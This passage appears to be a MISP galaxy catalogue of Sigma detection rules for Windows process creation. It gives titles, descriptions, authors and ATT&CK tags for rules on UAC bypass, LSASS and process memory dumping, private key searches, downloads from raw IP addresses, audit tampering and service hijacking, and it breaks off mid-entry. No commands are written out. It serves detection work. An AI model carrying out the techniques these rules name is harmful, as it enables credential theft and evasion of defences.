tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Reg Add Suspicious Paths

Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys

Internal MISP references

UUID b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 which can be used as unique global reference for Reg Add Suspicious Paths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Rare legitimate add to registry via cli (to these locations)']
filename proc_creation_win_reg_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Malicious PE Execution by Microsoft Visual Studio Debugger

There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.

Internal MISP references

UUID 15c7904e-6ad1-4a45-9b46-5fb25df37fd2 which can be used as unique global reference for Malicious PE Execution by Microsoft Visual Studio Debugger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community
creation_date 2020/10/14
falsepositive ['The process spawned by vsjitdebugger.exe is uncommon.']
filename proc_creation_win_susp_use_of_vsjitdebugger_bin.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Schtasks From Suspicious Folders

Detects scheduled task creations that have suspicious action command and folder combinations

Internal MISP references

UUID 8a8379b8-780b-4dbf-b1e9-31c8d112fefb which can be used as unique global reference for Schtasks From Suspicious Folders in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/15
falsepositive ['Unknown']
filename proc_creation_win_schtasks_folder_combos.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']
Related clusters

To see the related clusters, click here.

Delete All Scheduled Tasks

Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.

Internal MISP references

UUID 220457c1-1c9f-4c2e-afe6-9598926222c1 which can be used as unique global reference for Delete All Scheduled Tasks in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Unlikely']
filename proc_creation_win_schtasks_delete_all.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']
Related clusters

To see the related clusters, click here.

Detects events that appear when a user click on a link file with a powershell command in it

Internal MISP references

UUID 30e92f50-bb5a-4884-98b5-d20aa80f3d7a which can be used as unique global reference for Hidden Powershell in Link File Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/02/06
falsepositive ['Legitimate commands in .lnk files']
filename proc_creation_win_susp_embed_exe_lnk.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Node Process Executions

Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud

Internal MISP references

UUID df1f26d3-bea7-4700-9ea2-ad3e990cf90e which can be used as unique global reference for Node Process Executions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Unknown']
filename proc_creation_win_node_adobe_creative_cloud_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Potential CobaltStrike Process Patterns

Detects potential process patterns related to Cobalt Strike beacon activity

Internal MISP references

UUID f35c5d71-b489-4e22-a115-f003df287317 which can be used as unique global reference for Potential CobaltStrike Process Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/07/27
falsepositive ['Unknown']
filename proc_creation_win_hktl_cobaltstrike_process_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

DriverQuery.EXE Execution

Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers

Internal MISP references

UUID a20def93-0709-4eae-9bd2-31206e21e6b2 which can be used as unique global reference for DriverQuery.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/19
falsepositive ['Legitimate use by third party tools in order to investigate installed drivers']
filename proc_creation_win_driverquery_usage.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery']

Process Memory Dump via RdrLeakDiag.EXE

Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory

Internal MISP references

UUID edadb1e5-5919-4e4c-8462-a9e643b02c4b which can be used as unique global reference for Process Memory Dump via RdrLeakDiag.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/09/24
falsepositive ['Unknown']
filename proc_creation_win_rdrleakdiag_process_dumping.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Download From Direct IP Via Bitsadmin

Detects usage of bitsadmin downloading a file using an URL that contains an IP

Internal MISP references

UUID 99c840f2-2012-46fd-9141-c761987550ef which can be used as unique global reference for Suspicious Download From Direct IP Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

PsExec Service Child Process Execution as LOCAL SYSTEM

Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)

Internal MISP references

UUID 7c0dcd3d-acf8-4f71-9570-f448b0034f94 which can be used as unique global reference for PsExec Service Child Process Execution as LOCAL SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/07/21
falsepositive ['Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension']
filename proc_creation_win_sysinternals_psexesvc_as_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Mshta.EXE Execution Patterns

Detects suspicious mshta process execution patterns

Internal MISP references

UUID e32f92d1-523e-49c3-9374-bdb13b46a3ba which can be used as unique global reference for Suspicious Mshta.EXE Execution Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/07/17
falsepositive ['Unknown']
filename proc_creation_win_mshta_susp_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1106']
Related clusters

To see the related clusters, click here.

Suspicious File Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious

Internal MISP references

UUID ea0cdc3e-2239-4f26-a947-4e8f8224e464 which can be used as unique global reference for Suspicious File Encoded To Base64 Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_encode_susp_extensions.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Dynamic .NET Compilation Via Csc.EXE

Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.

Internal MISP references

UUID dcaa3f04-70c3-427a-80b4-b870d73c94c4 which can be used as unique global reference for Dynamic .NET Compilation Via Csc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
creation_date 2019/08/24
falsepositive ['Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897', 'Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962', 'Ansible']
filename proc_creation_win_csc_susp_dynamic_compilation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027.004']
Related clusters

To see the related clusters, click here.

SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code

Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs

Internal MISP references

UUID 36475a7d-0f6d-4dce-9b01-6aeb473bbaf1 which can be used as unique global reference for SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/07/16
falsepositive ['Unknown']
filename proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1216']
Related clusters

To see the related clusters, click here.

Execution via stordiag.exe

Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe

Internal MISP references

UUID 961e0abb-1b1e-4c84-a453-aafe56ad0d34 which can be used as unique global reference for Execution via stordiag.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer (@austinsonger)
creation_date 2021/10/21
falsepositive ['Legitimate usage of stordiag.exe.']
filename proc_creation_win_stordiag_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

PUA - NirCmd Execution As LOCAL SYSTEM

Detects the use of NirCmd tool for command execution as SYSTEM user

Internal MISP references

UUID d9047477-0359-48c9-b8c7-792cedcdc9c4 which can be used as unique global reference for PUA - NirCmd Execution As LOCAL SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/24
falsepositive ['Legitimate use by administrators']
filename proc_creation_win_pua_nircmd_as_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002', 'attack.s0029']
Related clusters

To see the related clusters, click here.

Application Removed Via Wmic.EXE

Uninstall an application with wmic

Internal MISP references

UUID b53317a0-8acf-4fd1-8de8-a5401e776b96 which can be used as unique global reference for Application Removed Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/28
falsepositive ['Unknown']
filename proc_creation_win_wmic_uninstall_application.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Private Keys Reconnaissance Via CommandLine Tools

Adversaries may search for private key certificate files on compromised systems for insecurely stored credential

Internal MISP references

UUID 213d6a77-3d55-4ce8-ba74-fcfef741974e which can be used as unique global reference for Private Keys Reconnaissance Via CommandLine Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/07/20
falsepositive ['Unknown']
filename proc_creation_win_susp_private_keys_recon.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.004']
Related clusters

To see the related clusters, click here.

Changing Existing Service ImagePath Value Via Reg.EXE

Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services

Internal MISP references

UUID 9b0b7ac3-6223-47aa-a3fd-e8f211e637db which can be used as unique global reference for Changing Existing Service ImagePath Value Via Reg.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Unknown']
filename proc_creation_win_reg_service_imagepath_change.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Child Process Of ClickOnce Application

Detects potentially suspicious child processes of a ClickOnce deployment application

Internal MISP references

UUID 67bc0e75-c0a9-4cfc-8754-84a505b63c04 which can be used as unique global reference for Potentially Suspicious Child Process Of ClickOnce Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/12
falsepositive ['Unknown']
filename proc_creation_win_dfsvc_suspicious_child_processes.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion']

Suspicious ConfigSecurityPolicy Execution

Upload file, credentials or data exfiltration with Binary part of Windows Defender

Internal MISP references

UUID 1f0f6176-6482-4027-b151-00071af39d7e which can be used as unique global reference for Suspicious ConfigSecurityPolicy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_configsecuritypolicy.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567']
Related clusters

To see the related clusters, click here.

Audit Policy Tampering Via NT Resource Kit Auditpol

Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.

Internal MISP references

UUID c6c56ada-612b-42d1-9a29-adad3c5c2c1e which can be used as unique global reference for Audit Policy Tampering Via NT Resource Kit Auditpol in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/18
falsepositive ["The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure"]
filename proc_creation_win_auditpol_nt_resource_kit_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.002']
Related clusters

To see the related clusters, click here.

Bypass UAC via Fodhelper.exe

Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.

Internal MISP references

UUID 7f741dcf-fc22-4759-87b4-9ae8376676a2 which can be used as unique global reference for Bypass UAC via Fodhelper.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
creation_date 2019/10/24
falsepositive ['Legitimate use of fodhelper.exe utility by legitimate user']
filename proc_creation_win_uac_bypass_fodhelper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Application Whitelisting Bypass via Dnx.exe

Execute C# code located in the consoleapp folder

Internal MISP references

UUID 81ebd28b-9607-4478-bf06-974ed9d53ed7 which can be used as unique global reference for Application Whitelisting Bypass via Dnx.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community
creation_date 2019/10/26
falsepositive ['Legitimate use of dnx.exe by legitimate user']
filename proc_creation_win_lolbin_dnx.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1027.004']
Related clusters

To see the related clusters, click here.

Windows Kernel Debugger Execution

Detects execution of the Windows Kernel Debugger "kd.exe".

Internal MISP references

UUID 27ee9438-90dc-4bef-904b-d3ef927f5e7e which can be used as unique global reference for Windows Kernel Debugger Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Rare occasions of legitimate cases where kernel debugging is necessary in production. Investigation is required']
filename proc_creation_win_kd_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Potential Dosfuscation Activity

Detects possible payload obfuscation via the commandline

Internal MISP references

UUID a77c1610-fc73-4019-8e29-0f51efc04a51 which can be used as unique global reference for Potential Dosfuscation Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/02/15
falsepositive ['Unknown']
filename proc_creation_win_cmd_dosfuscation.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious Calculator Usage

Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.

Internal MISP references

UUID 737e618a-a410-49b5-bec3-9e55ff7fbc15 which can be used as unique global reference for Suspicious Calculator Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/02/09
falsepositive ['Unknown']
filename proc_creation_win_calc_uncommon_exec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Potential ReflectDebugger Content Execution Via WerFault.EXE

Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow

Internal MISP references

UUID fabfb3a7-3ce1-4445-9c7c-3c27f1051cdd which can be used as unique global reference for Potential ReflectDebugger Content Execution Via WerFault.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/30
falsepositive ['Unknown']
filename proc_creation_win_werfault_reflect_debugger_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Potential Encoded PowerShell Patterns In CommandLine

Detects specific combinations of encoding methods in PowerShell via the commandline

Internal MISP references

UUID cdf05894-89e7-4ead-b2b0-0a5f97a90f2f which can be used as unique global reference for Potential Encoded PowerShell Patterns In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
creation_date 2020/10/11
falsepositive ['Unknown']
filename proc_creation_win_powershell_encoding_patterns.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Dropping Of Password Filter DLL

Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS

Internal MISP references

UUID b7966f4a-b333-455b-8370-8ca53c229762 which can be used as unique global reference for Dropping Of Password Filter DLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/10/29
falsepositive ['Unknown']
filename proc_creation_win_reg_credential_access_via_password_filter.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1556.002']
Related clusters

To see the related clusters, click here.

System Network Connections Discovery Via Net.EXE

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

Internal MISP references

UUID 1c67a717-32ba-409b-a45d-0fb704a73a81 which can be used as unique global reference for System Network Connections Discovery Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/10
falsepositive ['Unknown']
filename proc_creation_win_net_use_network_connections_discovery.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1049']
Related clusters

To see the related clusters, click here.

Potential ShellDispatch.DLL Functionality Abuse

Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute"

Internal MISP references

UUID 82343930-652f-43f5-ab70-2ee9fdd6d5e9 which can be used as unique global reference for Potential ShellDispatch.DLL Functionality Abuse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/06/20
falsepositive ['Unlikely']
filename proc_creation_win_rundll32_shelldispatch_potential_abuse.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion']

Suspicious Curl.EXE Download

Detects a suspicious curl process start on Windows and outputs the requested document to a local file

Internal MISP references

UUID e218595b-bbe7-4ee5-8a96-f32a24ad3468 which can be used as unique global reference for Suspicious Curl.EXE Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/07/03
falsepositive ['Unknown']
filename proc_creation_win_curl_susp_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Start Windows Service Via Net.EXE

Detects the usage of the "net.exe" command to start a service using the "start" flag

Internal MISP references

UUID 2a072a96-a086-49fa-bcb5-15cc5a619093 which can be used as unique global reference for Start Windows Service Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/21
falsepositive ['Legitimate administrator or user executes a service for legitimate reasons.']
filename proc_creation_win_net_start_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Enumerate All Information With Whoami.EXE

Detects the execution of "whoami.exe" with the "/all" flag

Internal MISP references

UUID c248c896-e412-4279-8c15-1c558067b6fa which can be used as unique global reference for Enumerate All Information With Whoami.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/04
falsepositive ['Unknown']
filename proc_creation_win_whoami_all_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Diskshadow Script Mode - Uncommon Script Extension Execution

Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.

Internal MISP references

UUID 1dde5376-a648-492e-9e54-4241dd9b0c7f which can be used as unique global reference for Diskshadow Script Mode - Uncommon Script Extension Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/15
falsepositive ['False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required.']
filename proc_creation_win_diskshadow_script_mode_susp_ext.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Psexec Execution

Detects user accept agreement execution in psexec commandline

Internal MISP references

UUID 730fc21b-eaff-474b-ad23-90fd265d4988 which can be used as unique global reference for Psexec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020/10/30
falsepositive ['Administrative scripts.']
filename proc_creation_win_sysinternals_psexec_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569', 'attack.t1021']
Related clusters

To see the related clusters, click here.

Suspicious RASdial Activity

Detects suspicious process related to rasdial.exe

Internal MISP references

UUID 6bba49bf-7f8c-47d6-a1bb-6b4dece4640e which can be used as unique global reference for Suspicious RASdial Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4
creation_date 2019/01/16
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_rasdial_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious New Service Creation

Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths

Internal MISP references

UUID 17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8 which can be used as unique global reference for Suspicious New Service Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/14
falsepositive ['Unlikely']
filename proc_creation_win_susp_service_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Exchange PowerShell Snap-Ins Usage

Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27

Internal MISP references

UUID 25676e10-2121-446e-80a4-71ff8506af47 which can be used as unique global reference for Exchange PowerShell Snap-Ins Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/03/03
falsepositive ['Unknown']
filename proc_creation_win_powershell_snapins_hafnium.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.collection', 'attack.t1114']
Related clusters

To see the related clusters, click here.

Potential Persistence Attempt Via Existing Service Tampering

Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.

Internal MISP references

UUID 38879043-7e1e-47a9-8d46-6bec88e201df which can be used as unique global reference for Potential Persistence Attempt Via Existing Service Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/09/29
falsepositive ['Unknown']
filename proc_creation_win_sc_service_tamper_for_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

UAC Bypass Using DismHost

Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)

Internal MISP references

UUID 853e74f9-9392-4935-ad3b-2e8c040dae86 which can be used as unique global reference for UAC Bypass Using DismHost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_dismhost.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Compressed File Creation Via Tar.EXE

Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.

Internal MISP references

UUID 418a3163-3247-4b7b-9933-dcfcb7c52ea9 which can be used as unique global reference for Compressed File Creation Via Tar.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), AdmU3
creation_date 2023/12/19
falsepositive ['Likely']
filename proc_creation_win_tar_compression.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.exfiltration', 'attack.t1560', 'attack.t1560.001']
Related clusters

To see the related clusters, click here.

Suspicious File Download From IP Via Wget.EXE - Paths

Detects potentially suspicious file downloads directly from IP addresses and stored in suspicious locations using Wget.exe

Internal MISP references

UUID 40aa399c-7b02-4715-8e5f-73572b493f33 which can be used as unique global reference for Suspicious File Download From IP Via Wget.EXE - Paths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/23
falsepositive ['Unknown']
filename proc_creation_win_wget_download_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Detects suspicious Plink tunnel port forwarding to a local port

Internal MISP references

UUID 48a61b29-389f-4032-b317-b30de6b95314 which can be used as unique global reference for Suspicious Plink Port Forwarding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/01/19
falsepositive ['Administrative activity using a remote port forwarding to a local port']
filename proc_creation_win_plink_port_forwarding.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572', 'attack.lateral_movement', 'attack.t1021.001']
Related clusters

To see the related clusters, click here.

Write Protect For Storage Disabled

Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.

Internal MISP references

UUID 75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13 which can be used as unique global reference for Write Protect For Storage Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2021/06/11
falsepositive ['Unknown']
filename proc_creation_win_reg_write_protect_for_storage_disabled.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']
Related clusters

To see the related clusters, click here.

Uncommon Assistive Technology Applications Execution Via AtBroker.EXE

Detects the start of a non built-in assistive technology applications via "Atbroker.EXE".

Internal MISP references

UUID f24bcaea-0cd1-11eb-adc1-0242ac120002 which can be used as unique global reference for Uncommon Assistive Technology Applications Execution Via AtBroker.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mateusz Wydra, oscd.community
creation_date 2020/10/12
falsepositive ['Legitimate, non-default assistive technology applications execution']
filename proc_creation_win_atbroker_uncommon_ats_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Renamed Visual Studio Code Tunnel Execution

Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel

